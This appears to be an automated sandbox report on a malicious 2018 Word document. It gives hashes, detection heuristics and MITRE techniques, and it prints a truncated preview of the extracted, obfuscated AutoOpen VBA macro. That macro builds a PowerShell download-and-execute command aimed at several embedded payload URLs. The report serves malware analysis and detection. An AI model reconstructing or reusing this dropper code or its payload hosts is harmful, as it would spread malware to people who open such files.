Office (OLE) malware analysis — malicious · 7a337ec623eaff28

MALICIOUS

Office (OLE)

140.5 KB Created: 2018-02-15 00:57:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 2fdb8cc5620773b9ff2aa07660685523 SHA-1: 4ccbca026bf2f890c445c128be78789bda6121c2 SHA-256: 7a337ec623eaff287e1fedbd78d0df3c9a4ff0eb086e9d075254ad755358038f

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute external code. The script appears to be designed to download and execute a second-stage payload from one of the embedded URLs, which are suspicious and likely malicious. The ClamAV detection further confirms its malicious nature.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6449686-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6449686-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://rwaOm1+Om1ndanor In document text (OLE body)
- http://mcf21zbTOYizBXvMbiAjkcZRjcfjYGcnttV�In document text (OLE body)
- http://mcf21zbTOYizBXvMbiAjkcZRjcfjYGcnttVIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28284 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28284 bytes
SHA-256: `ffc5a62b30c69d904434dd80d1384f91fc8c7a0872c458a7c9d5da9fcb3bb9e0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "fVWdJkmmLa" Function uMOhYikXdX() On Error Resume Next RZYDUX = (EcnMGGzYNbW - Int(EjnbhYZtiz) * uWOGodqkkvARV / Oct(DVrOl) - (MSPQNOVhdipwF - Sin(6805997))) rEWqJwaRDAb = (qszKuWqliDORY - Int(DhizGjbGwt) * HJHCGDMmIN / Oct(sDqWVjhMww) - (DaALzwCRjtFknN - Sin(6864574))) XssqhVzoozk = (bABfQQapaHj - Int(vYlvdKF) * CvENjrdjmSD / Oct(lzFMzR) - (nzKksPrWLIK - Sin(1447854))) ppiUzlzcY = (OJGnotUtBwOCHj) + HJjkJKD("wHXNsR0(), KQ5SDC);&(GfPDg+PDg4InyR0'+'+yR0voGf4+Gf4kGyR0Om1+Om1+yR0fpbjiwXjlAj", 6, 64) wDiwBHVOq = (LdShrKMwsUSacL - Int(CjPYQJVHAI) * cnpRXs / Oct(MvzoVqWjpDE) - (QZwiXpiu - Sin(1827103))) jYAzhCrQ = (qWRZiiYIawas - Int(PaNOZCjU) * DjsifJSb / Oct(zZYEdWvHnLjdH) - (YJjDJbIrcTZSk - Sin(6353797))) UmUYQ = (COpwH - Int(TsLzrSSPVn) * vnTYzGJAhGwE / Oct(KmOHkwqiARF) - (VFSJqcHf - Sin(7090131))) fZJTp = (HEZZwTZ) + HJjkJKD("ftUhBLoqQHwncwDBiim1ogpOm1,[cHar]124 -ReplACE Om1PDgOm1'+',[c'+'Har]39 -crEPLAcE '+'([cHar]71+[cHar]122+[cHar]80),[cHar]36) ) ') -crePLAce 'Om1',[char]39)\| & ( $pshoME[21]+$PShomE[30]+'x')PEToJLrVFmOFCtkobRp", 19, 175) pwSvzDO = (VOHdArqqdoYuno - Int(fjoKf) * vidpSMFfzi / Oct(abbwUaHoHjs) - (PkzQBfwlniV - Sin(5120166))) bozNPZij = (dnhikLjGpUL - Int(DLGjVXr) * zNETw / Oct(zzzvv) - (BRqmZK - Sin(4436612))) hjqQwTsPm = (LbaQnEwUr - Int(RHiXj) * iOijMjJu / Oct(FKlUTGLAT) - (YnnfrGfIsdocd - Sin(7078921))) KmwEMuKYmuK = (ofmFDLiZzK) + HJjkJKD("ipSSMKMWLWHuGaRjuf4yR0+yR0?GOm1+Om1f4);KQyR0+yR05yR0+yR0SDC yR0+'+'yOm1+Om1PDg+'+'PDgR0=yR0+yR0 KQ5envOm1+Om1:yR0+yR0pyR0+yR0ublicyR0+yROm1+Om10 y'+'R0+yR0+yR0+Om1+Om1yR0'+' yR0+yR0Gf4yR0Om1+Om1+yR0'+zrHNjXnKczPuvBl", 18, 183) SunMJCZqrO = (YQQjdhBuPvj - Int(IMFHvz) * tjkvYhRzczJckP / Oct(GCQIEMLEHC) - (zBTCVzltj - Sin(9954407))) jXCOMz = (VsCLjYwGSztd - Int(Dqmsli) * csCkQdZbJr / Oct(jfRjYGtdmIAjW) - (XNziN - Sin(8578097))) kcWsZPFZUr = (wYLcpR - Int(GzUzbHKwoXSfzI) * TbJfhsPazwwjkH / Oct(EiozXn) - (DIPsZZbLhtzC - Sin(830990))) zsRouPljR = (MzXzFGKjIcuiqa) + HJjkJKD("z.ru/LREyR0Om1+Om1+yR0xBR6/?httyR0'+'+yR0p://www.syR0+yR0ocialPDg+PDgm'+'ediacomOm1+Om1payR0+yR0nOm1+Om1y.ae/qeo'+'2yR0+yR0Az/?h'+'ttp://PDg+PDgsolaflon.eu/yR0'+'+yR0XEZ8s'WBZOHYtpTsOzwLEzmzhOkHhujFhFUcMJvSFYX", 2, 171) qjLQUdErC = (wlOFjhCVkXEtj - Int(PCjrShq) * brrOuX / Oct(Tuvkzam) - (WosoNiNmIEtR - Sin(4081506))) OXOjICM = (YXkzpKWO - Int(nfIRdJJjo) * PKDZsdbOFi / Oct(AGrzVYz) - (lcQHTEJEQkczXF - Sin(7748069))) kQBiTjc = (JVzsWO - Int(RfKnYRSHlJhDAz) * kVjYK / Oct(cjnuSlpAaH) - (WjwbIRlnwc - Sin(8414818))) oDFRvuDuqzk = (iSkqClIjXAQpS) + HJjkJKD("vtmtWkVjNtdnapIEtcofhPDcGmpCbjecyR0+yR0tGyR0+yR0f4yR0+yR0) Om1+zHWC", 29, 35) PFwJrismwuQ = (abDzl - Int(Bktzrif) * OzziTOIjlYi / Oct(VVhomW) - (EjJXKMqR - Sin(950433))) iCrkw = (aBbAu - Int(LCZMGsuqfTiqf) * FKVLa / Oct(FboSc) - (EiLXDHbdWmMJNM - Sin(7394483))) TiQQjHi = (sriAlCwP - Int(QZsnjNGkJoQ) * HPWPCjSwLzN / Oct(liwkcLB) - (vrmhipmYGYE - Sin(4740011))) TrJhMZmuq = (sGfcHKBEjU) + HJjkJKD("WNZA1+Om1R0Om1+Om1 Gf4 http://rwaOm1+Om1ndanor'+'pyR0Om1+Om1+yR0hanspyR0+yR0roPDg+PDgjPDg+Om1+Om1PDgecyR0+yR0t.orgyR0+yR0/xIeDFyR0+yROm1+Om10'+'fPFuoptWYwvNMhdDziwTRaXo", 5, 142) CtThLrjd = (jQdpjMturmt - Int(swwUZrdjEiWT) * FolHkQGmn / Oct(UwWDV) - (jZhZWkDDwz - Sin(3179936))) qjNnj = (FiFtKSbY - Int(nHVmCF) * dWCoHEUEotAUl / Oct(KmAmjJzaoDb) - (TvRLnTfJZaucMB - Sin(1859102))) ujHEzzMOz = (EQSHn - Int(cUVzVwuDh) * MKlYncGjobJksX / Oct(fzzWYlUJtT) - (qnzjPVsuQCQkNb - Sin(1865032))) lNaiwTl = (TLdBBRWIzm) + HJjkJKD("kPSutXTVp(yR0KQOm1+Om15nsadayPDg+PDgR0+yR0sd PDg+PDg= &(Gf4nGyR0+yR0fOm1rLhLhhDCNRRRC", 10, 63) ziSnEj = (nrzHXPO - Int(uOzCzdaUrOHm) * oijYBYfW / Oct(qCMzcBiqBahJ) - (vOoDNiVvEcSt - Sin(9819156))) jlIzsINmz = (RiWqjO - Int(XzpwAZ) * AMjEJBnSjwLAB / Oct(lZuGdsNIfkwuh) - (QzENFfusw - Sin(2630299))) imdkmuYEXF = (zUwwX ... (truncated)

SHA-256: ffc5a62b30c69d904434dd80d1384f91fc8c7a0872c458a7c9d5da9fcb3bb9e0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fVWdJkmmLa"
Function uMOhYikXdX()
On Error Resume Next
RZYDUX = (EcnMGGzYNbW - Int(EjnbhYZtiz) * uWOGodqkkvARV / Oct(DVrOl) - (MSPQNOVhdipwF - Sin(6805997)))
rEWqJwaRDAb = (qszKuWqliDORY - Int(DhizGjbGwt) * HJHCGDMmIN / Oct(sDqWVjhMww) - (DaALzwCRjtFknN - Sin(6864574)))
XssqhVzoozk = (bABfQQapaHj - Int(vYlvdKF) * CvENjrdjmSD / Oct(lzFMzR) - (nzKksPrWLIK - Sin(1447854)))
ppiUzlzcY = (OJGnotUtBwOCHj) + HJjkJKD("wHXNsR0(), KQ5SDC);&(GfPDg+PDg4InyR0'+'+yR0voGf4+Gf4kGyR0Om1+Om1+yR0fpbjiwXjlAj", 6, 64)
wDiwBHVOq = (LdShrKMwsUSacL - Int(CjPYQJVHAI) * cnpRXs / Oct(MvzoVqWjpDE) - (QZwiXpiu - Sin(1827103)))
jYAzhCrQ = (qWRZiiYIawas - Int(PaNOZCjU) * DjsifJSb / Oct(zZYEdWvHnLjdH) - (YJjDJbIrcTZSk - Sin(6353797)))
UmUYQ = (COpwH - Int(TsLzrSSPVn) * vnTYzGJAhGwE / Oct(KmOHkwqiARF) - (VFSJqcHf - Sin(7090131)))
fZJTp = (HEZZwTZ) + HJjkJKD("ftUhBLoqQHwncwDBiim1ogpOm1,[cHar]124 -ReplACE  Om1PDgOm1'+',[c'+'Har]39  -crEPLAcE  '+'([cHar]71+[cHar]122+[cHar]80),[cHar]36) ) ')  -crePLAce  'Om1',[char]39)| & ( $pshoME[21]+$PShomE[30]+'x')PEToJLrVFmOFCtkobRp", 19, 175)
pwSvzDO = (VOHdArqqdoYuno - Int(fjoKf) * vidpSMFfzi / Oct(abbwUaHoHjs) - (PkzQBfwlniV - Sin(5120166)))
bozNPZij = (dnhikLjGpUL - Int(DLGjVXr) * zNETw / Oct(zzzvv) - (BRqmZK - Sin(4436612)))
hjqQwTsPm = (LbaQnEwUr - Int(RHiXj) * iOijMjJu / Oct(FKlUTGLAT) - (YnnfrGfIsdocd - Sin(7078921)))
KmwEMuKYmuK = (ofmFDLiZzK) + HJjkJKD("ipSSMKMWLWHuGaRjuf4yR0+yR0?GOm1+Om1f4);KQyR0+yR05yR0+yR0SDC yR0+'+'yOm1+Om1PDg+'+'PDgR0=yR0+yR0 KQ5envOm1+Om1:yR0+yR0pyR0+yR0ublicyR0+yROm1+Om10 y'+'R0+yR0+yR0+Om1+Om1yR0'+' yR0+yR0Gf4yR0Om1+Om1+yR0'+zrHNjXnKczPuvBl", 18, 183)
SunMJCZqrO = (YQQjdhBuPvj - Int(IMFHvz) * tjkvYhRzczJckP / Oct(GCQIEMLEHC) - (zBTCVzltj - Sin(9954407)))
jXCOMz = (VsCLjYwGSztd - Int(Dqmsli) * csCkQdZbJr / Oct(jfRjYGtdmIAjW) - (XNziN - Sin(8578097)))
kcWsZPFZUr = (wYLcpR - Int(GzUzbHKwoXSfzI) * TbJfhsPazwwjkH / Oct(EiozXn) - (DIPsZZbLhtzC - Sin(830990)))
zsRouPljR = (MzXzFGKjIcuiqa) + HJjkJKD("z.ru/LREyR0Om1+Om1+yR0xBR6/?httyR0'+'+yR0p://www.syR0+yR0ocialPDg+PDgm'+'ediacomOm1+Om1payR0+yR0nOm1+Om1y.ae/qeo'+'2yR0+yR0Az/?h'+'ttp://PDg+PDgsolaflon.eu/yR0'+'+yR0XEZ8s'WBZOHYtpTsOzwLEzmzhOkHhujFhFUcMJvSFYX", 2, 171)
qjLQUdErC = (wlOFjhCVkXEtj - Int(PCjrShq) * brrOuX / Oct(Tuvkzam) - (WosoNiNmIEtR - Sin(4081506)))
OXOjICM = (YXkzpKWO - Int(nfIRdJJjo) * PKDZsdbOFi / Oct(AGrzVYz) - (lcQHTEJEQkczXF - Sin(7748069)))
kQBiTjc = (JVzsWO - Int(RfKnYRSHlJhDAz) * kVjYK / Oct(cjnuSlpAaH) - (WjwbIRlnwc - Sin(8414818)))
oDFRvuDuqzk = (iSkqClIjXAQpS) + HJjkJKD("vtmtWkVjNtdnapIEtcofhPDcGmpCbjecyR0+yR0tGyR0+yR0f4yR0+yR0) Om1+zHWC", 29, 35)
PFwJrismwuQ = (abDzl - Int(Bktzrif) * OzziTOIjlYi / Oct(VVhomW) - (EjJXKMqR - Sin(950433)))
iCrkw = (aBbAu - Int(LCZMGsuqfTiqf) * FKVLa / Oct(FboSc) - (EiLXDHbdWmMJNM - Sin(7394483)))
TiQQjHi = (sriAlCwP - Int(QZsnjNGkJoQ) * HPWPCjSwLzN / Oct(liwkcLB) - (vrmhipmYGYE - Sin(4740011)))
TrJhMZmuq = (sGfcHKBEjU) + HJjkJKD("WNZA1+Om1R0Om1+Om1 Gf4 http://rwaOm1+Om1ndanor'+'pyR0Om1+Om1+yR0hanspyR0+yR0roPDg+PDgjPDg+Om1+Om1PDgecyR0+yR0t.orgyR0+yR0/xIeDFyR0+yROm1+Om10'+'fPFuoptWYwvNMhdDziwTRaXo", 5, 142)
CtThLrjd = (jQdpjMturmt - Int(swwUZrdjEiWT) * FolHkQGmn / Oct(UwWDV) - (jZhZWkDDwz - Sin(3179936)))
qjNnj = (FiFtKSbY - Int(nHVmCF) * dWCoHEUEotAUl / Oct(KmAmjJzaoDb) - (TvRLnTfJZaucMB - Sin(1859102)))
ujHEzzMOz = (EQSHn - Int(cUVzVwuDh) * MKlYncGjobJksX / Oct(fzzWYlUJtT) - (qnzjPVsuQCQkNb - Sin(1865032)))
lNaiwTl = (TLdBBRWIzm) + HJjkJKD("kPSutXTVp(yR0KQOm1+Om15nsadayPDg+PDgR0+yR0sd PDg+PDg= &(Gf4nGyR0+yR0fOm1rLhLhhDCNRRRC", 10, 63)
ziSnEj = (nrzHXPO - Int(uOzCzdaUrOHm) * oijYBYfW / Oct(qCMzcBiqBahJ) - (vOoDNiVvEcSt - Sin(9819156)))
jlIzsINmz = (RiWqjO - Int(XzpwAZ) * AMjEJBnSjwLAB / Oct(lZuGdsNIfkwuh) - (QzENFfusw - Sin(2630299)))
imdkmuYEXF = (zUwwX
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.